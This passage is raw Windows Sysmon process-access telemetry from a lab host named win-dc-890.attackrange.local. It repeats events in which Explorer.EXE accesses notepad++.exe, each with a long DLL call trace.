6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.805{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.wind